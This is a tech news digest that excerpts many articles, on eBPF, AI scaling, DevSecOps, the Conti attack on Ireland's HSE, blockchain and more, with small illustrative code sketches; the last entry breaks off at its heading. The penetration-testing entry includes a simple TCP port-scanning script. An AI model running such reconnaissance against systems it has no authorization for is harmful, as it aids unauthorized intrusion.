Daily Tech Digest - December 14, 2021

How eBPF will solve Service Mesh - Goodbye Sidecars

Why have we not created a service mesh in the kernel before? Some people have been semi-jokingly stating that kube-proxy is the original service mesh. There is some truth to that. Kube-proxy is a good example of how close the Linux kernel can get to implementing a service mesh while relying on traditional network-based functionality implemented with iptables. However, it is not enough: the L7 context is missing. Kube-proxy operates exclusively on the network packet level. L7 traffic management, tracing, authentication, and additional reliability guarantees are required for modern applications. Kube-proxy cannot provide this at the network level. eBPF changes this equation. It allows the functionality of the Linux kernel to be extended dynamically. We have been using eBPF for Cilium to build a highly efficient network, security, and observability datapath that embeds itself directly into the Linux kernel. Applying this same concept, we can solve service mesh requirements at the kernel level as well. In fact, Cilium already implements a variety of the required concepts such as identity-based security, L3-L7 observability & authorization, encryption, and load-balancing.
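To make the mechanism concrete, here is a minimal sketch of extending the kernel from user space with eBPF. It uses the BCC toolkit rather than Cilium's own tooling (an illustrative assumption; Cilium's datapath is far more involved) and simply traces every IPv4 TCP connect from inside the kernel:

```python
# Minimal BCC sketch: compile a tiny eBPF program and attach it to a kernel
# function. Requires Linux, root privileges, and the bcc package installed.
from bcc import BPF

prog = r"""
int kprobe__tcp_v4_connect(struct pt_regs *ctx) {
    bpf_trace_printk("tcp_v4_connect observed\n");
    return 0;
}
"""

b = BPF(text=prog)   # compile the C snippet and load it into the kernel
b.trace_print()      # stream the kernel-side trace output to the console
```

The point of the sketch is the programming model: logic injected into the running kernel, with no kernel rebuild and no sidecar proxy in the packet path.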


General and Scalable Parallelization for Neural Networks

Because different model architectures may be better suited to different parallelization strategies, GSPMD is designed to support a large variety of parallelism algorithms appropriate for different use cases. For example, with smaller models that fit within the memory of a single accelerator, data parallelism is preferred, in which devices train the same model using different input data. In contrast, models that are larger than a single accelerator’s memory capacity are better suited for a pipelining algorithm (like that employed by GPipe) that partitions the model into multiple, sequential stages, or operator-level parallelism (e.g., Mesh-TensorFlow), in which individual computation operators in the model are split into smaller, parallel operators. GSPMD supports all the above parallelization algorithms with a uniform abstraction and implementation. Moreover, GSPMD supports nested patterns of parallelism. For example, it can be used to partition models into individual pipeline stages, each of which can be further partitioned using operator-level parallelism.
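As a concrete illustration of the simplest of these strategies, the sketch below expresses data parallelism in JAX, whose XLA compiler uses GSPMD as its partitioner. The computation and shapes are illustrative; pipeline and operator-level partitioning use sharding annotations (e.g., pjit) that are not shown here.

```python
# Data parallelism: the same program runs on every device, each on its own
# shard of the batch. jax.pmap handles the replication and the split.
import jax
import jax.numpy as jnp

n = jax.device_count()
x = jnp.arange(n * 4.0).reshape(n, 4)  # one batch shard per device

@jax.pmap
def step(batch):
    return jnp.tanh(batch) * 2.0  # identical computation on each device

print(step(x).shape)  # (n, 4): per-device results gathered back
```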

What 2022 can hold for the developer experience

To improve the developer experience, and ultimately retain and attract talent, businesses should begin to make changes to reduce the strain placed on developers and help them achieve a healthier work-life balance. The introduction of fairly simple initiatives such as flexi-time and offering mental health days can help to reduce the risk of burnout and show developers that they are valued members of the business whose needs are being listened to. Additionally, organisations could look to provide extra resources and adopt the tools and technology to enable developers to automate parts of their workload. Solutions such as data platforms that make use of machine learning (ML) are a prime example of this. The use of this type of technology would enable developers to easily add automation and predictions to applications without needing to be experts in ML. Adopting technologies that embed ML capabilities can also help to simplify the process of building, testing, and deploying ML models and speed up the process of integrating them into production applications.

2022 Cybersecurity Risk Mitigation Roadmap For CISO & CIO As Business Drivers

As companies become aware of the need for data protection, their leaders are likely to increase the adoption of encryption, which will find its way into organizations’ basic cybersecurity architecture in 2022. This will have a ripple effect, and we can expect newer and updated applications providing data encryption solutions to be launched for businesses in the coming year. One of the most disruptive technologies in decades, blockchain technology will be at the heart of shifting from a centralized server-based internet system to transparent cryptographic networks. AI has matured from an experimental topic to mainstream technology. As a result, 2022 will see better accessibility of Artificial Intelligence (AI) based tools for creating robust cybersecurity protocols within an organization. In addition, we expect the new lineup of technology tools to be more cost-effective and yet more effective than ever before. Last but not least, 2022 will see a mix of remote work and on-site physical presence, thereby continuing with the trends of cybersecurity adopted during 2021.

Intel reports new computing breakthroughs as it pursues Moore’s Law

Intel made the announcement at the IEEE International Electron Devices Meeting (IEDM) 2021. In the press release, Intel talked at length about its three areas of pathfinding and the breakthroughs that prove it’s on track to continue following its roadmap through 2025 and beyond. The company is focusing on several areas of research and reports significant progress in essential scaling technologies that will help it deliver more transistors in its future products. Intel’s engineers have been working on solutions to increase the interconnect density in chip packaging by at least 10 times. Intel also pointed to Foveros Direct, introduced at its Intel Accelerated event in July 2021, which will provide an order-of-magnitude increase in the interconnect density for 3D stacking by enabling sub-10-micron bump pitches. The tech giant is calling for other manufacturers to work together in order to establish new industry standards and testing procedures, allowing for the creation of a new hybrid bonding chiplet ecosystem.


Designing High-Volume Systems Using Event-Driven Architectures

Thanks to the latest developments in Event-Driven Architecture (EDA) platforms such as Kafka and data management techniques such as Data Meshes and Data Fabrics, designing microservices-based applications is now much easier. However, to ensure these microservices-based applications perform at requisite levels, it is important to ensure critical Non-Functional Requirements (NFRs) are taken into consideration at design time. In a series of blog articles, my colleagues Tanmay Ambre and Harish Bharti and I attempt to describe a cohesive approach to designing for NFRs. We take a use-case-based approach. In the first installment, we describe designing for “performance” as the first critical NFR. This article focuses on architectural and design decisions that are the basis of high-volume, low-latency processing. To make these decisions clear and easy to understand, we describe their application to a high-level use case of funds transfer. We have simplified the use case to focus mainly on performance.
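To illustrate the event-driven side of such a design, here is a hypothetical sketch of publishing a funds-transfer event with the kafka-python client; the topic name and event fields are ours, not from the article:

```python
# Publish a funds-transfer event to Kafka. Keying by source account keeps each
# account's events in a single partition, preserving per-account ordering.
import json
from kafka import KafkaProducer

producer = KafkaProducer(
    bootstrap_servers="localhost:9092",
    key_serializer=lambda k: k.encode("utf-8"),
    value_serializer=lambda v: json.dumps(v).encode("utf-8"),
)

event = {"type": "FundsTransferRequested", "from": "acct-001",
         "to": "acct-042", "amount": 250.00, "currency": "USD"}

producer.send("funds-transfer-events", key=event["from"], value=event)
producer.flush()  # block until the broker has acknowledged the event
```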


How Hoppscotch is building an open source ‘API development ecosystem’

The Hoppscotch platform constitutes multiple integrated API development tools, aimed at engineers, software developers, quality assurance (QA) testers, and product managers. It includes a web client, which is pitched as an “online collaborative API playground,” enabling multiple developers or teams to build, test, and share APIs. A separate command line interface (CLI) tool, meanwhile, is designed for integrating automated test runners as part of CI/CD pipelines. And then there is the API documentation generator, which helps developers create, publish, and maintain all the necessary API documentation in real time. Hoppscotch for teams, which is currently in public beta, allows companies to create individual groups for specific use-cases. For example, a company can create a team for its entire in-house workforce, where anyone can share APIs and related communications with anyone else. It can also create smaller groups for specific teams, such as QA testers, or for external vendors and partners where sensitive data needs to be kept separate from specific projects they are involved in.


Synthetic Quantum Systems Help Solve Complex Real-World Applications

Quantum Simulation is the most promising use of Pasqal’s QPU, in which the quantum processor is utilized to obtain knowledge about a quantum system of interest. It seems reasonable to employ a quantum system as a computational resource for quantum problems, as Richard Feynman pointed out in the 20th century. Neutral atom quantum processors will aid pure scientific discovery, and there are several sectors of application at the industrial level, such as the creation of novel materials for energy storage and transport, or chemical computations for drug development. “At Pasqal, we are not only scientists, we are not only academic, we industrialize our technology. By working with quantum technology, we want to build and sell a product which is reliable, and which helps to solve complex industrial problems in many contexts,” said Reymond. Among Pasqal’s customers is EDF, the French electricity utility. In the energy sector, Pasqal is working with EDF to develop innovative solutions for smart mobility.


Enterprise email encryption without friction? Yes, it’s possible

It is often (grudgingly) acknowledged in security circles that sometimes security must be partly sacrificed for better usability. But with Echoworx you can have the best of both worlds: a seamless, secure experience for organizations, their partners, vendors, and customers. “Our customers are mostly very large global enterprises in the finance, insurance, manufacturing, retail, and several other verticals,” says Derek Christiansen, Echoworx’s Engagement Manager. “When working with them, we must be sensitive to their needs. We do this by offering like-for-like encryption when we can, and by tailoring the integration of encryption to their existing flows.” ... The only thing that the customer needs to do is direct any email that needs encryption to the company’s infrastructure. “They can use their own data classification. That can be something as simple as an Office 365 rule. It’s also common to use a keyword (e.g., the word ‘secure’) in the email subject to route the message. We also have an optional plugin for Outlook that makes it really easy for senders,” Christiansen notes.


7 Critical Machine Intelligence Exams and The Hidden Link of MLOps with Product Management

The past 12 months have seen many machine learning operations tools gaining popularity. Interestingly, one feature is notably absent or rarely mentioned in the discussion: quality assurance. Academia has already initiated research into machine learning system testing. In addition, several vendors provide data quality support or leverage data testing libraries or data quality frameworks. Automated deployment exists as well in many tools. But what about canary deployments of models, and whatever happened to unit and integration testing in the machine learning universe? Many of these quality assurance proposals originate from an engineering mindset. However, more and more specialists without an engineering background perform a lot of model engineering. Further, recall that a separate person or team frequently runs the quality assurance activities, supposedly so that engineers can place their trust in others to catch mistakes. More cynical characters might insist that engineers need to be controlled and checked.
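For readers wondering what unit testing can look like in the machine learning universe, here is a hedged sketch: property-style tests for a feature-scaling step, runnable under pytest. The function and the properties tested are illustrative, not taken from the article.

```python
# Property-style unit tests for a preprocessing step of an ML pipeline.
import numpy as np

def normalize(features):
    """Step under test: scale each column to zero mean and unit variance."""
    return (features - features.mean(axis=0)) / features.std(axis=0)

def test_normalize_is_scale_invariant():
    x = np.random.default_rng(0).normal(size=(100, 3))
    # Rescaling the raw inputs should not change the normalized output.
    np.testing.assert_allclose(normalize(x), normalize(x * 10.0), atol=1e-9)

def test_normalize_output_statistics():
    x = np.random.default_rng(1).normal(size=(200, 5))
    out = normalize(x)
    np.testing.assert_allclose(out.mean(axis=0), 0.0, atol=1e-9)
    np.testing.assert_allclose(out.std(axis=0), 1.0, atol=1e-9)
```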



Quote for the day:

"Leaders dig into their business to learn painful realities rather than peaceful illusion." -- Orrin Woodward

Daily Tech Digest - December 13, 2021

Rebranding Data Governance

To successfully implement managed self-service business intelligence at any non-trivial scale, you need data governance. Data governance is also an essential part of building and nurturing a successful data culture. Despite the obvious value that data governance can provide, it has a bad reputation. Many people – likely including the leaders you need as allies if you’re working to build a data culture in your organization – have had negative experiences with data governance in the past, and now react negatively when the topic of data governance is raised. ... Data governance, and building a data culture in general, is as much about people as it is about processes and technology, and that means effective communication is key. Effective communication requires a shared vocabulary, and a shared understanding of the meaning of key words. It may be time to think about rebranding. Not unlike how a corporation with a reputation for all the wrong things might change its name in an effort to leave all those negative connotations behind without really changing its ways, maybe we need to rebrand data governance… at least some of the time.


Crypto Banks: The intersection of traditional finance and DeFi?

It is important to note that crypto banks are very much centralized like traditional banks, something which flies in the face of the true crypto experience, predicated on decentralisation and a reduction in intermediaries. This means that the problems of a banking collapse, hacks and attacks can still impact a person's money, and they are not achieving the financial independence that crypto offers. However, it also means that these crypto banks have regulatory standing and the ability to be compliant. They are legal entities that can be subject to laws and legislation; legislation that is constantly evolving to meet the changing of the times. At face value, it appears that these Digital Asset Institutions/"Crypto Banks" are appeasing those new to the space who are willing to join the early majority and move to a more crypto-focused financial way of life. Good UX, simple integrations with existing financial platforms, more financial options in a crypto context, and reliable regulation mean a massive open door for users to flood into if they are looking for this kind of experience.


Breakthrough Proof Clears Path for Quantum AI – Overcoming Threat of “Barren Plateaus”

“All hope of quantum speedup or advantage is lost if you have a barren plateau,” Cerezo said. The crux of the problem is a “vanishing gradient” in the optimization landscape. The landscape is composed of hills and valleys, and the goal is to train the model’s parameters to find the solution by exploring the geography of the landscape. The solution usually lies at the bottom of the lowest valley, so to speak. But in a flat landscape one cannot train the parameters because it’s difficult to determine which direction to take. That problem becomes particularly relevant when the number of data features increases. In fact, the landscape becomes exponentially flat with the feature size. Hence, in the presence of a barren plateau, the quantum neural network cannot be scaled up. The Los Alamos team developed a novel graphical approach for analyzing the scaling within a quantum neural network and proving its trainability. For more than 40 years, physicists have thought quantum computers would prove useful in simulating and understanding quantum systems of particles, which choke conventional classical computers. 


Great Engineering Teams Focus On Milestones Instead of Projects

The problem is that we aspire to unnecessary precision. We don’t need to know exact estimates to ensure engineering focuses on the most important work. The cost of producing exact estimates is wasteful. And it doesn’t even produce the outcome you’re looking for. You don’t need to pretend the feature will be done on June 20. This date is most certainly incorrect anyway. Milestones reduce the complexity of putting together high-level estimates. They give a shorthand that can be good enough for most decision-making, without the overhead of rigorous estimation. Occasionally, I see people succeed at rigorous estimation. But it’s rarely systemic – it’s usually one individual who is good at it. And it relies on them. If they go on vacation for a week, nobody is able to feed their model, and it collapses. While this is a great skill, to me it is the exception that proves the rule. Think of it this way: if one in twenty people can estimate in a high complexity situation, how many could be more successful in a less complex situation?


Better management through anthropology

“Almost all business leaders and policymakers could benefit by asking the basic question that dogs anthropology: if a Martian was to land here suddenly and look around, what might they see?” writes Tett. In 1997, when GM was struggling to get teams of engineers from its small car group, its Saturn subsidiary, and Germany’s Opel to create a new vehicle together, the company called in anthropologist Elizabeth Briody to figure out what was wrong. Briody discovered the source of the dysfunction in differing cultural assumptions about meetings. The Opel team expected meetings to be agenda-driven, decision-making sessions; the small car group expected working sessions in which ideas would be shared and discussed; and the Saturn teams expected consensus-building sessions. As a result, the meetings were chaotic and frustrating for everyone. Unfortunately, Briody’s insights came too late, and GM’s senior product development leaders shut down the project. Lastly and most intriguingly, anthropology can help surface what Tett calls social silence.


“Curiosity is a skill you can develop”: Microsoft UK’s National Technology Officer on driving innovation forwards

“The pandemic experience has been a great example of how those values truly help our decision-making and our approach to markets. We faced unprecedented demand for our technologies because of the shift to home working. But we only have finite resources, so we worked out where to focus our attention and apply the most value. It was a strong statement, which came directly down from Satya, that we needed to ensure we are preserving life and that our technology was going to play a critical role.” Of the numerous case studies showing how Microsoft has used its pioneering technology to help with the response to the pandemic, Robinson offers two examples. First, Imperial College Healthcare NHS Trust, one of the largest in England, used mixed-reality HoloLens headsets on its COVID-19 wards to enable an entire team of specialists to join doctors virtually on the frontlines of the pandemic, keeping them safe as they helped patients with the virus. Additionally, Microsoft is driving artificial intelligence innovation at Alder Hey Hospital, a children’s hospital in Liverpool, and allowing doctors to make life-changing decisions remotely.


Overcoming Challenges to Automating DevSecOps

When you first move to security automation, you’ll find some security tasks that can easily be automated and others that are harder to fit in. DevSecOps teams will need to use many tools to cover all their bases, but no one wants teams checking lots of different tool outputs. Making it easier to see what’s going on and where risk lies by consolidating security tools and results in a central platform is the way to go. This makes life easier by giving a single pane of glass. Everyone generally agrees that DevOps teams must adopt cybersecurity best practices, but testing takes time. Development teams don’t have time to learn, use and check lots of security tools on top of their existing workload. Automated solutions get to work without any real need for maintenance or management. These solutions trigger tools to work at the right time depending on the outcomes found without any manual input needed. This gives you and your team valuable time back to focus on other important matters. The goal of CI/CD pipelines is fast delivery of build and release steps, typically through automation. 


Unused identities: A growing security threat

The first step towards taking control over your identities and assets’ authorizations is to know what you have. This starts with scanning across all your XaaS environments – that’s SaaS, IaaS, and PaaS – and taking an inventory of which identities have authorization to which assets. This involves ingesting the data from these different environments, normalizing the data into a workable model, and then correlating it with your identities from your identity provider (IDP) like Okta, Ping, Azure AD, or Google. The goal here is to understand the relationship between the identities and assets, assessing a wide range of factors including their usage and if they are right sized to meet the policies/needs of the organization. Are there identities with permissions to assets that have not been used in at least 60 days? This might be a good time to revoke those authorizations. But that’s just a surface-level case. Once you start analyzing your entitlements on a deeper level, you’ll begin to find that there are more permissions granted to your identities than you’re likely to want to admit.
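A hypothetical sketch of that 60-day staleness check follows; the grant records and field names are illustrative, not any vendor's actual data model:

```python
# Flag authorizations whose last recorded use is older than the policy window.
from datetime import datetime, timedelta

STALE_AFTER = timedelta(days=60)

def find_stale_grants(grants, now):
    """Return grants never used, or unused for longer than STALE_AFTER."""
    return [g for g in grants
            if g["last_used"] is None or now - g["last_used"] > STALE_AFTER]

grants = [
    {"identity": "svc-backup", "asset": "s3://finance-exports",
     "last_used": datetime(2021, 9, 1)},
    {"identity": "jane.doe", "asset": "payroll-db",
     "last_used": datetime(2021, 12, 5)},
]

for g in find_stale_grants(grants, now=datetime(2021, 12, 13)):
    print(f"revocation candidate: {g['identity']} -> {g['asset']}")
```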


Digital transformation: 4 CIO tips for 2022

To be more agile, innovation and development teams must be closer to the business and have the entire team involved in new product development, testing, and validation. This ensures that their priorities are met from the beginning and no time or resources are wasted. Performance and regression testing and security scanning must be baked in throughout, in real-time, to shorten the development cycle for maximum efficiency. In our organization, that meant moving to weekly sprints and release cycles for our internal infrastructure. Each week, our business reps prioritized what was most important and participated in the testing and validation process. As we worked to roll out our new partner portal, our marketing and support teams were involved from the very beginning, advising the development team and testing features and functionality. By bringing IT and business operations closer together, we’ve been able to balance innovation and operations without having to sacrifice either, even when talent or resources have been limited.


Report Dissects Conti Ransomware Attack on Ireland's HSE

The HSE attack began on March 18 from a malware infection on an HSE workstation - dubbed "Patient Zero Workstation" - as the result of a user clicking and opening a malicious Microsoft Excel file that was attached to a phishing email sent to the user on March 16. "After gaining unauthorized access to the HSE’s IT environment on March 18, the attacker continued to operate in the environment over an eight week period until the detonation of the Conti ransomware on May 14," the report says. "This included compromising and abusing a significant number of accounts with high levels of privileges, compromising a significant number of servers, exfiltrating data and moving laterally to statutory and voluntary hospitals." ... "There were several detections of the attacker’s activity prior to May 14, but these did not result in a cybersecurity incident and investigation initiated by the HSE and as a result, opportunities to prevent the successful detonation of the ransomware were missed."



Quote for the day:

"Leadership does not always wear the harness of compromise." -- Woodrow Wilson

Daily Tech Digest - December 12, 2021

AWS Among 12 Cloud Services Affected by Flaws in Eltima SDK

USB Over Ethernet enables sharing of multiple USB devices over Ethernet, so that users can connect to devices such as webcams on remote machines anywhere in the world as if the devices were physically plugged into their own computers. The flaws are in the USB Over Ethernet function of the Eltima SDK, not in the cloud services themselves, but because of code-sharing between the server side and the end user apps, they affect both clients – such as laptops and desktops running Amazon WorkSpaces software – and cloud-based machine instances that rely on services such as Amazon Nimble Studio AMI, that run in the Amazon cloud. The flaws allow attackers to escalate privileges so that they can launch a slew of malicious actions, including kneecapping the very security products that users depend on for protection. Specifically, the vulnerabilities can be used to “disable security products, overwrite system components, corrupt the operating system or perform malicious operations unimpeded,” SentinelOne senior security researcher Kasif Dekel said in a report published on Tuesday.


Rust in the Linux Kernel: ‘Good Enough’

When we first looked at the idea of Rust in the Linux kernel, it was noted that the objective was not to rewrite the kernel’s 25 million lines of code in Rust, but rather to augment new development with a language more memory-safe than the standard C normally used in Linux development. Part of the issue with using Rust is that Rust is built on LLVM, as opposed to GCC, and consequently supports fewer architectures. This is a problem we saw play out when the Python cryptography library replaced some old C code with Rust, leading to a situation where certain architectures would not be supported. Hence, using Rust for drivers would limit the impact of this particular limitation. Ojeda further noted that the Rust for Linux project has been invited to a number of conferences and events this past year, and even garnered some support from Red Hat, which joins Arm, Google, and Microsoft in supporting the effort. According to Ojeda, Red Hat says that “there is interest in using Rust for kernel work that Red Hat is considering.”


DeepMind tests the limits of large AI language systems with 280-billion-parameter model

DeepMind, which regularly feeds its work into Google products, has probed the capabilities of these LLMs by building a language model with 280 billion parameters named Gopher. Parameters are a quick measure of a language model’s size and complexity, meaning that Gopher is larger than OpenAI’s GPT-3 (175 billion parameters) but not as big as some more experimental systems, like Microsoft and Nvidia’s Megatron model (530 billion parameters). It’s generally true in the AI world that bigger is better, with larger models usually offering higher performance. DeepMind’s research confirms this trend and suggests that scaling up LLMs does offer improved performance on the most common benchmarks testing things like sentiment analysis and summarization. However, researchers also cautioned that some issues inherent to language models will need more than just data and compute to fix. “I think right now it really looks like the model can fail in a variety of ways,” said Rae.


2022 transformations promise better builders, automation, robotics

The Great Resignation is real, and it has affected the logistics industry more than anyone realizes. People don’t want low-paying and difficult jobs when there’s a global marketplace where they can find better work. Automation will be seen as a way to address this, and in 2022, we will see a lot of tech VC investment in automation and robotics. Some say SpaceX and Virgin can deliver cargo via orbit, but I think that’s ridiculous. What we need (and what I think will be funded in 2022) are more electric and autonomous vehicles like eVTOL, a company that is innovating the “air mobility” market. According to eVTOL’s website, the U.S. Department of Defense has awarded $6 million to the City of Springfield, Ohio, for a National Advanced Air Mobility Center of Excellence. ... In 2022 transformations, grocery will cease to be an in-store retail experience only, and the sector will be as virtual and digitally-driven as the best of them. Things get interesting when we combine locker pickup, virtual grocery, and automated last-mile delivery using autonomous vehicles that can deliver within a mile of the warehouse or store.


Penetration testing explained: How ethical hackers simulate attacks

In a broad sense, a penetration test works in exactly the same way that a real attempt to breach an organization's systems would. The pen testers begin by examining and fingerprinting the hosts, ports, and network services associated with the target organization. They will then research potential vulnerabilities in this attack surface, and that research might suggest further, more detailed probes into the target system. Eventually, they'll attempt to breach their target's perimeter and get access to protected data or gain control of their systems. The details, of course, can vary a lot; there are different types of penetration tests, and we'll discuss the variations in the next section. But it's important to note first that the exact type of test conducted and the scope of the simulated attack needs to be agreed upon in advance between the testers and the target organization. A penetration test that successfully breaches an organization's important systems or data can cause a great deal of resentment or embarrassment among that organization's IT or security leadership.
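The reconnaissance step can be as simple as checking which ports accept connections. Below is a minimal sketch of a TCP connect scan in Python; real testers use far richer tooling such as nmap, and this should only ever be run against hosts you are authorized to test:

```python
# Minimal TCP "connect" scan of a few common ports.
import socket

COMMON_PORTS = [22, 80, 443, 3306, 8080]

def scan(host, ports=COMMON_PORTS, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the port accepted
                open_ports.append(port)
    return open_ports

print(scan("127.0.0.1"))
```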


EV charging in underground carparks is hard. Blockchain to the rescue

According to Bharadwaj, the concrete and steel environment effectively acted as a “Faraday cage,” which meant that the EV chargers wouldn’t talk to people’s mobile phones when they tried to initiate charging. You could find yourself stranded, unable to charge your car. “So we had to innovate.” ... As with any EV charging, a payment app connects your car to the EV charger. With Xeal, the use of NFC means the only time you need the Internet is to download the app in the first instance to create a profile that includes your personal and vehicle information and payment details. You then receive a cryptographic token on your mobile phone that authenticates your identity and enables you to access all of Xeal’s public charging stations. The token is time-bound, which means it dissolves after use. To charge your car, you hold your phone up to the charger. Your mobile reads the cryptographic token, automatically bringing up an NFC scanner. It opens the app, authenticates your charging session, starts scanning, and within milliseconds, the charging session starts.
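Xeal has not published the details of its scheme, but a time-bound, single-use token can be illustrated with a simple HMAC construction. The sketch below is purely illustrative and is not Xeal's implementation:

```python
# Issue and redeem a time-bound, single-use ("dissolving") token.
import hashlib, hmac, secrets, time

SECRET = secrets.token_bytes(32)  # held by the charging network
USED_NONCES = set()

def issue_token(user_id, ttl_seconds=60):
    expires = int(time.time()) + ttl_seconds
    nonce = secrets.token_hex(8)
    msg = f"{user_id}|{expires}|{nonce}".encode()
    sig = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{user_id}|{expires}|{nonce}|{sig}"

def redeem(token):
    user_id, expires, nonce, sig = token.rsplit("|", 3)
    msg = f"{user_id}|{expires}|{nonce}".encode()
    expected = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False                      # forged or corrupted token
    if int(expires) < time.time() or nonce in USED_NONCES:
        return False                      # expired, or already "dissolved"
    USED_NONCES.add(nonce)
    return True

t = issue_token("driver-42")
print(redeem(t))  # True: first use within the time window
print(redeem(t))  # False: the token dissolves after one use
```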


Top 8 AI and ML Trends to Watch in 2022

The scarcity of skilled AI developers or engineers stands as a major barrier to adopting AI technology in many companies. No-code and low-code technologies come to the rescue. These solutions aim to offer simple interfaces that, in theory, can be used to develop highly complex AI systems. Today, web design and no-code user interface (UI) tools let users create web pages simply by dragging and dropping graphical elements together. Similarly, no-code AI technology allows developers to create intelligent AI systems by simply merging different ready-made modules and feeding them industrial domain-specific data. Furthermore, NLP, low-code, and no-code technologies will soon enable us to instruct complex machines with our voice or written instructions. These advancements will result in the “democratization” of AI, ML, and data technologies. ... In 2022, with the aid of AI and ML technologies, more businesses will automate multiple yet repetitive processes that involve large volumes of information and data. In the coming years, an increased rate of automation can be seen in various industries using robotic process automation (RPA) and intelligent business process management software (iBPMS).


The limitations of scaling up AI language models

Large language models like OpenAI’s GPT-3 show an aptitude for generating humanlike text and code, automatically writing emails and articles, composing poetry, and fixing bugs in software. But the dominant approach to developing these models involves leveraging massive computational resources, which has consequences. Beyond the fact that training and deploying large language models can incur high technical costs, the requirements put the models beyond the reach of many organizations and institutions. Scaling also doesn’t resolve the major problem of model bias and toxicity, which often creeps in from the data used to train the models. In a panel during the Conference on Neural Information Processing Systems (NeurIPS) 2021, experts from the field discussed how the research community should adapt as progress in language models continues to be driven by scaled-up algorithms. The panelists explored how to ensure that smaller institutions can meaningfully research and audit large-scale systems, as well as ways that they can help to ensure that the systems behave as intended.


Here are three ways distributed ledger technology can transform markets

While firms have narrowed their scope to address more targeted pain points, the increased digitalisation of assets is helping to drive interest in the adoption of DLT in new ways. Previous talk of mass disruption of the financial system has given way to more realistic, but still transformative, discussions around how DLT could open doors to a new era of business workflows, enabling transactional exchanges of assets and payments to be recorded, linked, and traced throughout their entire lifecycle. DLT’s true potential rests with its ability to eliminate traditional “data silos”, so that parties no longer need to build separate recording systems, each holding a copy of their version of “the truth”. This inefficiency leads to time delays, increased costs and data quality issues. In addition, the technology can enhance security and resilience, and would give regulators real-time access to ledger transactions to monitor and mitigate risk more effectively. In recent years, we have been pursuing a number of DLT-based opportunities, helping us understand where we believe the technology can deliver maximum value while retaining the highest levels of risk management.


To identity and beyond—One architect's viewpoint

Simple is often better: You can do (almost) anything with technology, but it doesn't mean you should. Especially in the security space, many customers overengineer solutions. I like this video from Google’s Stripe conference to underscore this point.

People, process, technology: Design for people to enhance process, not tech first. There are no "perfect" solutions. We need to balance various risk factors, and decisions will be different for each business. Too many customers design an approach that their users later avoid.

Focus on 'why' first and 'how' later: Be the annoying 7-year-old kid with a million questions. We can't arrive at the right answer if we don't know the right questions to ask. Lots of customers make assumptions on how things need to work instead of defining the business problem. There are always multiple paths that can be taken.

Long tail of past best practices: Recognize that best practices are changing at light speed.



Quote for the day:

"Eventually relationships determine the size and the length of leadership." -- John C. Maxwell

Daily Tech Digest - December 11, 2021

Why a Little-Known Blockchain-Based Identity Project in Ethiopia Should Concern Us All

We have countless examples of the dangers of national ID schemes in general, including from Kenya, Uganda, Pakistan, India and elsewhere. But while national ID schemes can be highly problematic, building them on blockchain could be catastrophic. Putting aside the very obvious logistical hurdles, including very low internet penetration rates in Ethiopia (that are significantly lower in more rural regions) and the displacement of children from schools due to ongoing conflict and humanitarian challenges, there are much deeper problems with Hoskinson’s plans. Blockchain is fundamentally an accounting technology designed to track and trace digital assets through an immutable ledger of transactions. Blockchain-based ID schemes similarly treat identity as a transactional, mathematical problem. The more transactions, the more profitable for the network. There are also serious privacy and data protection concerns with the logging of all this metadata. While proponents of blockchain-based ID claim that concerns are unfounded if the system is designed correctly and identity documents are kept off ledger, the dangers of metadata in this context are well-documented.


Everyone is burned out. That's becoming a security nightmare

In many organisations, it's cybersecurity staff who are there to counter activity that could make the network vulnerable to cyberattacks – but according to the paper, cybersecurity professionals are more burned out than other workers. The research suggests that 84% of security professionals are feeling burned out, compared with 80% of other workers. And when cybersecurity employees are burned out, they're more likely than other workers to describe themselves as "completely checked out" and "doing the bare minimum at work" – a state of mind reported by one in 10 cybersecurity professionals, compared with one in 20 other employees. That attitude could easily result in security threats being missed or flaws not being fixed in time, something that could put the whole company at risk from cyber incidents. "Pandemic-fueled burnout – and resultant workplace apathy and distraction – has emerged as the next significant security risk," said Jeff Shiner, chief executive officer at 1Password. "It's particularly surprising to find that burned-out security leaders, charged with protecting businesses, are doing a far worse job of following security guidelines – and putting companies at risk".


How Can We Get​ Blockchains to Talk to Each Other?

Solving this problem is a booming area of research though, and last month Schulte and his colleagues presented a potential workaround at the IEEE International Conference on Blockchain Computing and Applications. Their approach relies on blockchain relays, which are essentially smart contracts running on one blockchain that can verify events on another blockchain. If a user wants to transfer an asset they first destroy, or “burn,” it on the source blockchain, which is typically done by sending the asset to a user address that doesn’t exist. This transaction also includes details of the asset and which blockchain and user they want to send it to. Third parties monitor the source blockchain for these burn transactions and then send them to the relay for a small reward, which verifies the burn transaction and recreates the asset on the new blockchain. The challenge, says Schulte, is that these verification processes incur transaction fees that can quickly make the approach impractical. So they created a verification on-demand system where the relay assumes transactions are valid unless they are disputed.
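A toy model of that burn-and-recreate flow (not the authors' actual relay contracts) looks something like this:

```python
# Toy cross-chain transfer: destroy the asset on the source chain, then a
# third party forwards the burn event so the relay re-creates it on the target.
BURN_ADDRESS = "0x" + "00" * 20  # an address nobody controls

class Chain:
    def __init__(self, name):
        self.name, self.balances = name, {}

    def burn(self, owner, amount, target_chain, target_user):
        assert self.balances.get(owner, 0) >= amount, "insufficient balance"
        self.balances[owner] -= amount
        # Sending to an unowned address destroys the asset on this chain.
        self.balances[BURN_ADDRESS] = self.balances.get(BURN_ADDRESS, 0) + amount
        return {"amount": amount, "target_chain": target_chain,
                "target_user": target_user}

def relay(event, chains):
    """The relay accepts the burn (here: trusts it) and re-mints the asset."""
    target = chains[event["target_chain"]]
    user = event["target_user"]
    target.balances[user] = target.balances.get(user, 0) + event["amount"]

chains = {"A": Chain("A"), "B": Chain("B")}
chains["A"].balances["alice"] = 10
relay(chains["A"].burn("alice", 10, "B", "alice"), chains)
print(chains["B"].balances["alice"])  # 10: the asset now lives on chain B
```

In the optimistic variant the researchers describe, the relay skips per-transaction verification and assumes burns are valid unless disputed, which is what keeps the fees manageable.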


DeFi architect Andre Cronje said it’s time to give up on the inaccurate term “decentralized finance”

